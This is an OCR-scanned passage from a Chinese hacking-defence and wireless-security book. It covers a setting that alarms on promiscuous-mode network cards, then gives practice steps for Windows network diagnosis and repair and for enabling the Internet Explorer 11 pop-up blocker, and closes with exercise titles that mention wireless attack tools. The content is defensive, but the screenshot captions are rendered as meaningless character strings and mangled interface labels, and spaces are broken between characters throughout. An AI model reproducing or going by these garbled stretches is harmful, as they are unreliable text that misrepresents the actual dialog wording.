服务 器 ， 一 旦 检测 到 就 会 将 其 隔离 。 

(8) “检测 到 混杂 模式 网 卡 时 报警 ” 
复 选 框 : 检测 无 线 局 域 网 内 处 于 混杂 模式 
的 网 卡 ， 防 止 无 线 局 域 网 计算 机 运行 黑客 
软件 、 嗅 探 软件 、 抓 包 软 件 等 ， 当 检测 出 
来 后 给 出 报警 信息 。 


14.5 “实战 演练 
实战 演练 1 诊断 和 修复 网 络 不 通 


当 自 己 的 计算 机 不 能 上 网 时 ， 说 明 计 
算 机 与 网 络 连接 不 通 ， 这 时 就 需要 诊断 和 
修复 网 络 了 ， 具 体 的 操作 步骤 如 下 。 
[step 图 打开 “网 络 连 接 ” 窗 口 ， 选 中 需要 诊 
断 的 网 络 图 标 并 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “诊断 ”选项 ， 弹 出 “Windows 网 络 
诊断 ”窗口 ， 并 显示 网 络 诊断 的 进度 ， 如 下 
图 所 示 。 


司 windows 网 结论 断 


正在 检测 问题 


CE 


第 14 章 无 线 局 域 网 的 安全 防护 


step 图 诊断 完成 后 ， 将 会 在 下 方 的 窗 格 中 显 
示 诊 断 的 结果 ， 如 下 图 所 示 。 


司 Windews 网络 允 新 
其 余 修复 操作 需要 具有 管理 员 权 限 


已 到 问 是 
通 本 天 以太 网 已 亲朋 四 


时 宕 试 以 管理 吴 身份 进行 这 些 修复 
全 浏览 其 他 选项 
二 看 济 员 信息 


关 癌 


单 击 “ 尝 试 以 管理 员 身份 进行 这 些 修 
复 ” 链 接 ， 即 可 开始 对 诊断 出 来 的 问题 进 
行 修复 ， 如 下 图 所 示 。 


司 Windews 网 络 沙 断 


正在 解决 问题 


正在 验证 是 否 已 骨 坟 网络 话 呈 部 呈 壮 有 题 - 


CE 


[Sep 图 修复 完毕 后 ， 会 给 出 修复 的 结果 ， 提 
示 用 户 疑 难 解答 已 经 完成 ， 并 在 下 方 显示 
已 修复 信息 提示 ， 如 下 图 所 示 。 


各 


司 Windews 网 络 双 新 


绛 难 解答 已 充 成 
属 寻 衣 答 对 系统 进行 了 一 些 更 改 ， 青 尝 式 之 前 曾 兰 斌 执行 的 任务 
已 找 到 问 是 
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SS 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


实战 演练 2 一 一 屏蔽 网 页 广告 弹 窗 


JInterest Explorer 11 浏 览 器 具有 屏蔽 网 
页 广告 弹 窗 的 功能 ， 使 用 该 功能 屏蔽 网 页 
广告 弹 窗 的 操作 步骤 如 下 。 
Esteep 园 在 IE 11 浏 览 器 的 工作 界面 中 选择 “ 工 
具 ” 一 “弹出 窗口 阻止 程序 ”菜单 命令 ， 
如 下 图 所 示 。 


EL Pp- 8c | 国 ER- 下 
xn wn sew wa EE eu 


ss 


[sep 贺 打开 “弹出 窗口 阻止 程序 ”对 话 框 ， 
提示 用 户 是 否 确实 要 启用 Interest Explorer 弹 
出 窗口 阻止 程序 ， 如 下 图 所 示 。 


step 园 打开 “弹出 窗口 阻止 程序 设置 ”对 话 
框 ， 在 “要 允许 的 网 站 地 址 ”文本 框 中 输 
入 允许 的 网 站 地 址 ， 如 下 图 所 示 。 


ES 


8 

] DO, 人 本 
-| srsren. 
ti EW 
[7 


L_amw | 


0 


BN 


se 


单 击 “ 添 加 ”按钮 ， 即 可 将 输入 的 网 
站 地 址 添加 到 “允许 的 站 点 ”列表 当中 。 
单 击 “关闭 ”按钮 ， 即 可 完成 弹出 窗口 阻 
止 程序 的 设置 操作 ， 如 下 图 所 示 。 


午 当 闭口 服 上 入 太 设 委 


因 en 停 可 以 杷 将 直 网 关 沪 加 到 下 可 中 ， 从 而 多 许字 月 
[i 确实 要 启用 |nternet Fyplorer 强健 口 阳 止 保 字 加 ) A 
(wwwuobaecm | 
单 击 “是 ”按钮 ， 即 可 启用 该 功能 ， 一 
然后 选择 “工具 ”一 “弹出 窗口 阻止 程 
序 ”一 “弹出 窗口 阻止 程序 设置 ”菜单 命令， 
如 下 图 所 示 。 
Sk Em 闻 下 评定 和 @ aa 
. 
14.6 ”小 试 身手 
Be 练习 1: 无 线 局 域 网 查看 工具 的 使 用 。 
练习 2: 无 线 局 域 网 攻击 工具 的 使 用 。 
到 二 Y | 练习 3: 无 线 局 域 网 安全 辅助 工具 的 
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使 用 。 


